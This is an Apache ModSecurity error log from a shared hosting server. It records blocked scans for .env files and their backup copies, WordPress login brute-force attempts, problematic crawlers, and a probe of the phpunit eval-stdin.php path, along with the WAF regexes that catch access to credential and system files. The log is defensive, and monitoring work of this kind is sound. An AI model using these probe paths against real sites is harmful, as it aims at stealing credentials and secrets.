[Tue May 26 14:39:58.864899 2026] [proxy_http:error] [pid 626747:tid 626931] [client 208.84.100.238:56470] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.865102 2026] [proxy:error] [pid 626747:tid 626899] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.865119 2026] [security2:error] [pid 626747:tid 626886] [client 208.84.100.238:56304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahVjZhVF8Qmdmw_OMfIObQAAARM"]
[Tue May 26 14:39:58.865139 2026] [proxy_http:error] [pid 626747:tid 626899] [client 208.84.100.238:56314] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.865237 2026] [proxy:error] [pid 626747:tid 626982] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.865278 2026] [proxy_http:error] [pid 626747:tid 626982] [client 208.84.100.238:56316] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.865409 2026] [proxy:error] [pid 626747:tid 626975] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.865448 2026] [proxy_http:error] [pid 626747:tid 626975] [client 208.84.100.238:56338] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.865656 2026] [security2:error] [pid 626747:tid 626889] [client 208.84.100.238:56366] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahVjZhVF8Qmdmw_OMfIObAAAARY"]
[Tue May 26 14:39:58.865668 2026] [security2:error] [pid 626747:tid 626955] [client 208.84.100.238:56360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahVjZhVF8Qmdmw_OMfIOcAAAAVg"]
[Tue May 26 14:39:58.865945 2026] [proxy:error] [pid 626747:tid 626982] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.865990 2026] [proxy_http:error] [pid 626747:tid 626982] [client 208.84.100.238:56316] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.866661 2026] [security2:error] [pid 626747:tid 626997] [client 208.84.100.238:56488] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahVjZhVF8Qmdmw_OMfIOaQAAAYI"]
[Tue May 26 14:39:58.867178 2026] [proxy:error] [pid 626747:tid 626961] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.867271 2026] [proxy_http:error] [pid 626747:tid 626961] [client 208.84.100.238:56012] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.867443 2026] [security2:error] [pid 626747:tid 626930] [client 208.84.100.238:56422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahVjZhVF8Qmdmw_OMfIOYQAAAT8"]
[Tue May 26 14:39:58.867484 2026] [security2:error] [pid 626747:tid 626879] [client 208.84.100.238:56380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahVjZhVF8Qmdmw_OMfIOcwAAAQw"]
[Tue May 26 14:39:58.867506 2026] [security2:error] [pid 626747:tid 626934] [client 208.84.100.238:56334] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahVjZhVF8Qmdmw_OMfIOcQAAAUM"]
[Tue May 26 14:39:58.867958 2026] [proxy:error] [pid 626747:tid 626961] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.868038 2026] [proxy_http:error] [pid 626747:tid 626961] [client 208.84.100.238:56012] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.868340 2026] [security2:error] [pid 626747:tid 626985] [client 208.84.100.238:56332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.amdsi.org.in"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahVjZhVF8Qmdmw_OMfIOcgAAAXY"]
[Tue May 26 14:39:58.869838 2026] [proxy:error] [pid 626747:tid 626938] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.869874 2026] [proxy_http:error] [pid 626747:tid 626938] [client 208.84.100.238:56292] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.870444 2026] [proxy:error] [pid 626747:tid 626938] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:58.870775 2026] [proxy_http:error] [pid 626747:tid 626938] [client 208.84.100.238:56292] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:58.888453 2026] [security2:error] [pid 626747:tid 626999] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjZhVF8Qmdmw_OMfIOUAAAAYQ"]
[Tue May 26 14:39:59.150767 2026] [proxy:error] [pid 626747:tid 626952] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:59.150835 2026] [proxy_http:error] [pid 626747:tid 626952] [client 208.84.100.238:56334] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:59.151422 2026] [proxy:error] [pid 626747:tid 626952] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:39:59.151454 2026] [proxy_http:error] [pid 626747:tid 626952] [client 208.84.100.238:56334] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:39:59.619052 2026] [security2:error] [pid 626747:tid 626907] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjZxVF8Qmdmw_OMfIOhQAAASg"]
[Tue May 26 14:40:00.447554 2026] [security2:error] [pid 626747:tid 626833] [remote 216.73.216.30:21473] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "support.mosykay.com"] [uri "/logo.php"] [unique_id "ahVjaBVF8Qmdmw_OMfIOpAABiVU"]
[Tue May 26 14:40:00.859659 2026] [security2:error] [pid 626747:tid 626776] [remote 216.73.216.30:21473] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "support.mosykay.com"] [uri "/index.php"] [unique_id "ahVjaBVF8Qmdmw_OMfIOtwABLBw"]
[Tue May 26 14:40:02.266709 2026] [security2:error] [pid 626747:tid 626970] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjaRVF8Qmdmw_OMfIO1gAAAWc"]
[Tue May 26 14:40:04.004115 2026] [security2:error] [pid 626747:tid 626891] [client 202.141.83.254:53996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjbBVF8Qmdmw_OMfIPHAAAARg"]
[Tue May 26 14:40:04.005741 2026] [security2:error] [pid 626747:tid 626891] [client 202.141.83.254:53996] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjbBVF8Qmdmw_OMfIPHAAAARg"]
[Tue May 26 14:40:04.288299 2026] [security2:error] [pid 626747:tid 626955] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjaxVF8Qmdmw_OMfIPGwAAAVg"]
[Tue May 26 14:40:06.281315 2026] [security2:error] [pid 626747:tid 626973] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjbRVF8Qmdmw_OMfIPWAAAAWo"]
[Tue May 26 14:40:07.237645 2026] [security2:error] [pid 626747:tid 626847] [remote 57.141.2.2:34996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.chettinadavenue.com"] [uri "/chettinad-rooms.php"] [unique_id "ahVjbxVF8Qmdmw_OMfIPcQABhGM"]
[Tue May 26 14:40:08.323572 2026] [security2:error] [pid 626747:tid 626992] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjbxVF8Qmdmw_OMfIPiQAAAX0"]
[Tue May 26 14:40:10.534501 2026] [security2:error] [pid 626747:tid 626938] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjchVF8Qmdmw_OMfIPrQAAAUc"]
[Tue May 26 14:40:11.782604 2026] [security2:error] [pid 626747:tid 626919] [client 85.208.96.201:62904] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVjcxVF8Qmdmw_OMfIP6wAAATQ"]
[Tue May 26 14:40:11.782754 2026] [security2:error] [pid 626747:tid 626919] [client 85.208.96.201:62904] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVjcxVF8Qmdmw_OMfIP6wAAATQ"]
[Tue May 26 14:40:13.304868 2026] [security2:error] [pid 626747:tid 626899] [client 185.255.126.41:53105] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "toronto121mortgage.com"] [uri "/process.php"] [unique_id "ahVjdRVF8Qmdmw_OMfIQDAAAASA"], referer: http://toronto121mortgage.com/index.php
[Tue May 26 14:40:13.844463 2026] [security2:error] [pid 626747:tid 626901] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjdRVF8Qmdmw_OMfIQGAAAASI"]
[Tue May 26 14:40:14.393466 2026] [security2:error] [pid 626747:tid 626948] [client 202.141.83.254:19800] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjdhVF8Qmdmw_OMfIQNgAAAVE"]
[Tue May 26 14:40:14.393576 2026] [security2:error] [pid 626747:tid 626948] [client 202.141.83.254:19800] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVjdhVF8Qmdmw_OMfIQNgAAAVE"]
[Tue May 26 14:40:14.820658 2026] [security2:error] [pid 626747:tid 626917] [client 47.128.61.194:57862] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.karuppuswamykovil.in"] [uri "/robots.txt"] [unique_id "ahVjdhVF8Qmdmw_OMfIQRAAAATI"]
[Tue May 26 14:40:15.268103 2026] [security2:error] [pid 626747:tid 626920] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjdhVF8Qmdmw_OMfIQSAAAATU"]
[Tue May 26 14:40:15.390485 2026] [security2:error] [pid 626747:tid 626908] [client 89.221.206.108:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjdxVF8Qmdmw_OMfIQWwAAASk"], referer: https://anujtradingco.com
[Tue May 26 14:40:15.969757 2026] [security2:error] [pid 626747:tid 626867] [remote 101.99.50.238:51240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.50.99.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVjdxVF8Qmdmw_OMfIQZwABenc"]
[Tue May 26 14:40:16.176696 2026] [http2:info] [pid 636820:tid 636820] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:40:16.770363 2026] [security2:error] [pid 636820:tid 636959] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjeK_r6oOphPch7B9v4QAAAAk"]
[Tue May 26 14:40:16.843028 2026] [security2:error] [pid 636820:tid 636984] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/.env"] [unique_id "ahVjeK_r6oOphPch7B9v9QAAACI"]
[Tue May 26 14:40:17.184937 2026] [security2:error] [pid 636820:tid 637029] [client 108.136.162.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVjea_r6oOphPch7B9wCgAAAE8"]
[Tue May 26 14:40:17.742751 2026] [security2:error] [pid 636820:tid 637069] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/laravel/.env"] [unique_id "ahVjea_r6oOphPch7B9wHwAAAHc"]
[Tue May 26 14:40:18.006912 2026] [security2:error] [pid 636820:tid 636965] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/api/.env"] [unique_id "ahVjeq_r6oOphPch7B9wKQAAAA8"]
[Tue May 26 14:40:18.274854 2026] [security2:error] [pid 636820:tid 636983] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/backend/.env"] [unique_id "ahVjeq_r6oOphPch7B9wLQAAACE"]
[Tue May 26 14:40:18.436213 2026] [security2:error] [pid 636820:tid 636955] [client 176.65.139.237:23928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "new.wrapmachines.com"] [uri "/.env"] [unique_id "ahVjeq_r6oOphPch7B9wMQAAAAU"]
[Tue May 26 14:40:18.539512 2026] [security2:error] [pid 636820:tid 636997] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/public/.env"] [unique_id "ahVjeq_r6oOphPch7B9wPQAAAC8"]
[Tue May 26 14:40:18.604353 2026] [security2:error] [pid 636820:tid 636967] [client 34.63.117.220:6208] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVjeq_r6oOphPch7B9wOAAAEXA"]
[Tue May 26 14:40:18.815727 2026] [security2:error] [pid 636820:tid 636975] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/server/.env"] [unique_id "ahVjeq_r6oOphPch7B9wSQAAABk"]
[Tue May 26 14:40:18.871410 2026] [security2:error] [pid 636820:tid 636987] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVjeq_r6oOphPch7B9wMAAAACU"]
[Tue May 26 14:40:18.885466 2026] [security2:error] [pid 636820:tid 636972] [client 34.63.117.220:6208] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVjeq_r6oOphPch7B9wRQAAFnE"]
[Tue May 26 14:40:19.086164 2026] [security2:error] [pid 636820:tid 637022] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/core/.env"] [unique_id "ahVje6_r6oOphPch7B9wTAAAAEg"]
[Tue May 26 14:40:19.352333 2026] [security2:error] [pid 636820:tid 637020] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/config/.env"] [unique_id "ahVje6_r6oOphPch7B9wVQAAAEY"]
[Tue May 26 14:40:19.626397 2026] [security2:error] [pid 636820:tid 637063] [client 108.136.162.67:57635] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "anujtradingco.com"] [uri "/app/.env"] [unique_id "ahVje6_r6oOphPch7B9wYwAAAHE"]
[Tue May 26 14:40:19.948312 2026] [security2:error] [pid 636820:tid 637052] [client 108.136.162.67:57635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.162.136.108.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahVje6_r6oOphPch7B9wZwAAAGY"]
